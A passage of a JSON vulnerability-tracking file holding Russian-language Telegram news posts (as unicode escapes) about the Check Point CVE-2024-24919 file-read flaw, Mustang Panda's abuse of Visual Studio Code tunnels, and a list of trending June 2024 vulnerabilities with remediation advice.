\u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0430\u0442\u044c\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u0438 \u0441\u0435\u0442\u0438 \u0436\u0435\u0440\u0442\u0432\u044b \u0438 \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u044f\u0442\u044c \u043a\u043e\u0434\u043e\u043c Visual Studio \u0434\u043b\u044f \u0442\u0443\u043d\u043d\u0435\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0442\u0440\u0430\u0444\u0438\u043a\u0430.\n\nMnemonic \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u043e\u0432\u0430\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c Check Point \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0434\u043e \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0438 \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0432\u0441\u0435\u0445 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0448\u043b\u044e\u0437\u0430\u0445 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\n\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c \u0442\u0430\u043a\u0436\u0435 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0441\u043c\u0435\u043d\u0438\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u0438/\u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u0434\u043b\u044f \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0439 LDAP \u0441\u043e \u0448\u043b\u044e\u0437\u0430 \u0432 Active Directory, \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u043f\u043e\u0441\u043b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432 \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u043e\u0432 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 \u0438, \u0435\u0441\u043b\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u0438\u0433\u043d\u0430\u0442\u0443\u0440\u0443 Check Point IPS \u0434\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.", "creation_timestamp": "2024-05-30T17:47:49.000000Z"}, {"uuid": "fa628c50-fcc1-47f1-8e74-c99c90498ce5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://t.me/true_secator/6183", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Palo Alto Networks \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442 \u043e \u043d\u043e\u0432\u043e\u0439 \u0442\u0430\u043a\u0442\u0438\u043a\u0435 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u043e\u0439 APT Mustang Panda, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u044f\u0435\u0442 Visual Studio Code \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u0438\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0432 \u042e\u0433\u043e-\u0412\u043e\u0441\u0442\u043e\u0447\u043d\u043e\u0439 \u0410\u0437\u0438\u0438.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u044f\u044e\u0442 \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u043e\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0435\u0439 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0439 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 Visual Studio Code, \u0447\u0442\u043e\u0431\u044b \u0437\u0430\u043a\u0440\u0435\u043f\u0438\u0442\u044c\u0441\u044f \u0432 \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u0441\u0435\u0442\u044f\u0445.\n\n\u041f\u0440\u0438\u0447\u0435\u043c \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u043e\u0432\u0430\u044f \u0442\u0435\u0445\u043d\u0438\u043a\u0430 \u0432\u043f\u0435\u0440\u0432\u044b\u0435\u00a0\u0431\u044b\u043b\u0430 \u0437\u0430\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0438 \u043f\u0440\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0432 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u0435 2023 \u0433\u043e\u0434\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0422\u0440\u0443\u0432\u0438\u0441\u043e\u043c \u0422\u043e\u0440\u043d\u0442\u043e\u043d\u043e\u043c.\n\nMustang Panda, \u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a BASIN, Bronze President, Camaro Dragon, Earth Preta, HoneyMyte, RedDelta \u0438 Red Lich, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0441 2012 \u0433\u043e\u0434\u0430 \u0438 \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436 \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0438 \u0440\u0435\u043b\u0438\u0433\u0438\u043e\u0437\u043d\u044b\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e \u0432\u0441\u0435\u0439 \u0415\u0432\u0440\u043e\u043f\u0435 \u0438 \u0410\u0437\u0438\u0438, \u043f\u0440\u0435\u0436\u0434\u0435 \u0432\u0441\u0435\u0433\u043e, \u0432\u00a0\u0441\u0442\u0440\u0430\u043d\u0430\u0445 \u042e\u0436\u043d\u043e-\u041a\u0438\u0442\u0430\u0439\u0441\u043a\u043e\u0433\u043e \u043c\u043e\u0440\u044f.\n\n\u041f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u0430\u044f \u0441\u0435\u0440\u0438\u044f \u0430\u0442\u0430\u043a \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0439 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 Visual Studio Code \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0438 \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f Visual Studio Code \u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0446\u0435\u043b\u044f\u0445 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043b\u0438\u0431\u043e \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0438\u043b\u0438 \u0436\u0435 \u043f\u0443\u0442\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u0440\u0442\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 code.exe (\u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b \u0434\u043b\u044f Visual Studio Code).\n\n\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u044d\u0442\u043e\u0433\u043e \u0448\u0430\u0433\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432 \u0432\u0435\u0431-\u0441\u0440\u0435\u0434\u0443 Visual Studio Code, \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u0443\u044e \u043a \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c\u0443 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0435\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0438\u043b\u0438 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u043d\u043e\u0432\u044b\u0435 \u0444\u0430\u0439\u043b\u044b.\n\n\u041f\u0440\u0438\u0447\u0435\u043c \u0440\u0430\u043d\u0435\u0435 \u0432 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443 mnemonic \u0442\u0430\u043a\u0436\u0435 \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u044d\u0442\u043e\u0439 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u0432 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 0-day \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Check Point (CVE-2024-24919, \u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 8,6).\n\n\u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, Mustang Panda \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e, \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0438 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a, \u043a\u0430\u043a \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442\u0441\u044f, \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043b OpenSSH \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434, \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043f\u043e \u0441\u0435\u0442\u0438.\n\n\u041d\u043e \u0438 \u044d\u0442\u043e \u0435\u0449\u0435 \u043d\u0435 \u0432\u0441\u0435: \u0431\u043e\u043b\u0435\u0435 \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0439 \u0441\u0440\u0435\u0434\u044b \u0432\u044b\u044f\u0432\u0438\u043b \u0432\u0442\u043e\u0440\u043e\u0439 \u043a\u043b\u0430\u0441\u0442\u0435\u0440 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438, \u0438\u043d\u043e\u0433\u0434\u0430 \u0434\u0430\u0436\u0435 \u043d\u0430 \u043e\u0434\u043d\u0438\u0445 \u0438 \u0442\u0435\u0445 \u0436\u0435 \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u0445 \u0442\u043e\u0447\u043a\u0430\u0445, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0443\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439\u00a0\u043c\u043e\u0434\u0443\u043b\u044c\u043d\u044b\u0439 \u0431\u044d\u043a\u0434\u043e\u0440 ShadowPad.\n\n\u0412 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043d\u0435\u044f\u0441\u043d\u043e, \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u043b\u0438 \u044d\u0442\u0438 \u0434\u0432\u0430 \u0442\u0438\u043f\u0430 \u0432\u0442\u043e\u0440\u0436\u0435\u043d\u0438\u0439 \u0434\u0440\u0443\u0433 \u0441 \u0434\u0440\u0443\u0433\u043e\u043c. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u044d\u0442\u0438 \u0434\u0432\u0430 \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0430 \u0438\u0441\u0445\u043e\u0434\u044f\u0442 \u0432\u0441\u0435 \u0436\u0435 \u043e\u0442 \u043e\u0434\u043d\u043e\u0433\u043e \u0438 \u0442\u043e\u0433\u043e \u0436\u0435 \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u0430 - Stately Taurus.", "creation_timestamp": "2024-09-09T19:50:49.000000Z"}, {"uuid": "fee0a90b-9b24-4467-ac08-736abbd1c0ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/true_secator/5960", "content": "\u0421\u043b\u0435\u0434\u0443\u044f \u0432\u044b\u0448\u0435\u0438\u0437\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c \u0443\u043c\u043e\u0437\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f\u043c \u0413\u0440\u0438\u0431\u043e\u0432, \u041f\u043e\u0437\u0438\u0442\u0438\u0432\u044b \u043f\u0440\u043e\u0448\u0435\u0440\u0441\u0442\u0438\u043b\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0438\u0437 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u0435\u0439 \u0432\u0435\u043d\u0434\u043e\u0440\u043e\u0432, \u0441\u043e\u0446\u0441\u0435\u0442\u0435\u0439, \u0431\u043b\u043e\u0433\u043e\u0432, \u0422\u0413-\u043a\u0430\u043d\u0430\u043b\u043e\u0432, \u0431\u0430\u0437 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432, \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0445 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0435\u0432 \u043a\u043e\u0434\u0430, \u0432\u044b\u0434\u0435\u043b\u0438\u0432 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0442\u0440\u0435\u043d\u0434\u043e\u0432\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438\u044e\u043d\u044f.\n\n\u041f\u043e \u0441\u0443\u0442\u0438 \u044d\u0442\u043e \u0441\u0430\u043c\u044b\u0435 \u043e\u043f\u0430\u0441\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043b\u0438\u0431\u043e \u0443\u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0432\u0436\u0438\u0432\u0443\u044e, \u043b\u0438\u0431\u043e \u043c\u043e\u0433\u0443\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0435\u0435 \u0432\u0440\u0435\u043c\u044f.\n\n\u0412 \u044d\u0442\u043e\u043c \u043c\u0435\u0441\u044f\u0446\u0435 \u0442\u0430\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043c\u043d\u043e\u0433\u043e \u2014 \u0434\u0435\u0432\u044f\u0442\u044c:\n\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Microsoft Windows, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439: \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 CSC (CVE-2024-26229), \u0441\u043b\u0443\u0436\u0431\u0435 Error Reporting (CVE-2024-26169) \u0438 \u044f\u0434\u0440\u0435 \u041e\u0421 (CVE-2024-30088);\n\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430, \u0432 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432\u043e\u043c \u044f\u0437\u044b\u043a\u0435 PHP \u043d\u0430 \u0443\u0437\u043b\u0430\u0445 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c Windows (CVE-2024-4577);\n\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044e \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, \u0432 \u044f\u0434\u0440\u0435 Linux (CVE-2024-1086);\n\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u0432 Check Point Quantum Security Gateways (CVE-2024-24919);\n\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 VMware vCenter, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 (CVE-2024-37079, CVE-2024-37080);\n\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Veeam Backup &amp; Replication, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u043e\u0431\u0445\u043e\u0434\u0443 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 (CVE-2024-29849).\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u043f\u043e \u043a\u0430\u0436\u0434\u043e\u0439 \u0441 \u0443\u043a\u0430\u0437\u0430\u043d\u0438\u0435\u043c \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0443 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0436\u0435\u0440\u0442\u0432, \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0438 \u043a\u043e\u043c\u043f\u0435\u043d\u0441\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u043c\u0435\u0440 - \u0432 \u0431\u043b\u043e\u0433\u0435\u00a0Positive Technologies.", "creation_timestamp": "2024-07-11T18:50:01.000000Z"}, {"uuid": "dfa886b4-86cf-4e69-b4f5-af0d579a407e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/true_secator/5813", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442 \u043e \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0438 PoC \u0434\u043b\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u043e\u0433\u043e \u043d\u0443\u043b\u044f Check Point VPN.\n\n\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f 27 \u043c\u0430\u044f\u00a0\u0438 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2024-24919 (CVSS 8,6) \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439 \u0447\u0442\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u0448\u043b\u044e\u0437\u0430\u0445, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u044b \u0431\u043b\u0435\u0439\u0434\u044b IPSec VPN \u0438\u043b\u0438 Mobile Access.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Check Point, \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, \u0448\u043b\u044e\u0437\u044b Quantum Security \u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 Quantum Spark.\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043d\u0430 \u0448\u043b\u044e\u0437\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0432 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f\u0445 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 